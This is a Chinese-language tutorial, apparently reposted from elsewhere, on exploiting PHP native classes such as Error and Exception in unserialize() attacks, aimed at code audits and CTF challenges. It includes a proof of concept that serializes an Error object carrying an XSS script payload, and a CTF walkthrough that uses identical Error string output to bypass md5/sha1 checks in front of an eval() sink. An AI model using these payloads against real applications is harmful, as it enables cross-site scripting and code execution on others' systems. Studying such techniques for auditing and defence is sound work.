深入了解PHP反序列化原生类
发布时间:2022-08-10 11:21:42 所属栏目:PHP教程 来源:互联网
导读:浅析php反序列化原生类的利用 如果在代码审计或者ctf中,有反序列化的功能点,但是却不能构造出完整的pop链,那这时我们应该如何破局呢?我们可以尝试一下从php原生类下手,php有些原生类中内置一些魔术方法,如果我们巧妙构造可控参数,触发并利用其内置魔
|
浅析php反序列化原生类的利用 如果在代码审计或者ctf中,有反序列化的功能点,但是却不能构造出完整的pop链,那这时我们应该如何破局呢?我们可以尝试一下从php原生类下手,php有些原生类中内置一些魔术方法,如果我们巧妙构造可控参数,触发并利用其内置魔术方法,就有可能达到一些我们想要的目的。 一、常见魔术方法 __wakeup() //执行unserialize()时,先会调用这个函数 __sleep() //执行serialize()时,先会调用这个函数 __destruct() //对象被销毁时触发 __call() //在对象上下文中调用不可访问的方法时触发 __callStatic() //在静态上下文中调用不可访问的方法时触发 __get() //用于从不可访问的属性读取数据或者不存在这个键都会调用此方法 __set() //用于将数据写入不可访问的属性 __isset() //在不可访问的属性上调用isset()或empty()触发 __unset() //在不可访问的属性上使用unset()时触发 __toString() //把对象当作字符串使用时触发 __invoke() //当尝试将对象调用为函数时触发 二、原生类中的魔术方法 我们采用下面脚本遍历一下所有原生类中的魔术方法 <?php$classes = get_declared_classes();foreach ($classes as $class) { $methods = get_class_methods($class); foreach ($methods as $method) { if (in_array($method, array( '__destruct', '__toString', '__wakeup', '__call', '__callStatic', '__get', '__set', '__isset', '__unset', '__invoke', '__set_state' ))) { print $class . '::' . $method . "n"; } }} 三、一些常见原生类的利用 Error/Exception Error 是所有PHP内部错误类的基类。 (PHP 7, 8) **Error::__toString ** error 的字符串表达 返回 Error 的 string表达形式。 Exception是所有用户级异常的基类。 (PHP 5, 7, 8) **Exception::__toString ** 将异常对象转换为字符串 返回转换为字符串(string)类型的异常。 类属性 message 错误消息内容 code 错误代码 file 抛出错误的文件名 line 抛出错误的行数 XSS __toString方法会返回错误或异常的字符串形式,其中包含我们输入的参数,如果我们构造一串xss代码,结合echo渲染,将触发反射形xss漏洞 示例: <?php$a = unserialize($_GET['a']);echo $a; POC: <?php$a = new Error("<script>alert('xss')</script>");$b = serialize($a);echo urlencode($b); image-20220327114659883 hash绕过 先看一道题 [2020 极客大挑战]Greatphp <?phperror_reporting(0);class SYCLOVER { public $syc; public $lover; public function __wakeup(){ if( ($this->syc != $this->lover) && (md5($this->syc) === md5($this->lover)) && (sha1($this->syc)=== sha1($this->lover)) ){ if(!preg_match("/<?php|(|)|"|'/", $this->syc, $match)){ eval($this->syc); } else { die("Try Hard !!"); } } }}if (isset($_GET['great'])){ unserialize($_GET['great']);} else { highlight_file(__FILE__);} 需要绕过两个hash强比较,且最终需要构造eval代码执行 显然正常方法是行不通的,而通过原生类可进行绕过 同样,当md5()和sha1()函数处理对象时,会自动调用__tostring方法 先简单看一下其输出 <?php$a=new Error("payload",1);$b=new Error("payload",2);$c=new Exception("payload",3); $d=new Exception("payload",4); echo $a."<br>"; echo $b."<br>"; echo $c."<br>"; echo $d; image-20220322205917541 可以发现,这两个原生类返回的信息除了行号一模一样,利用这点,我们可以尝试进行hash函数的绕过,需要注意的是,必须将两个传入的对象放到同一行 因此我们可以进行简单的测试,发现使用此方法可以绕过hash强(弱)函数比较 <?php$a = new Error("payload",1);$b = new Error("payload",2);if ($a!=$b){ echo '$a不等于$b'."n";}if (md5($a)===md5($b)){ echo "md5值相等n";}if (sha1($a)===sha1($b)){ echo "sha1值相等";} (编辑:揭阳站长网) 【声明】本站内容均来自网络,其相关言论仅代表作者个人观点,不代表本站立场。若无意侵犯到您的权利,请及时与联系站长删除相关内容! |
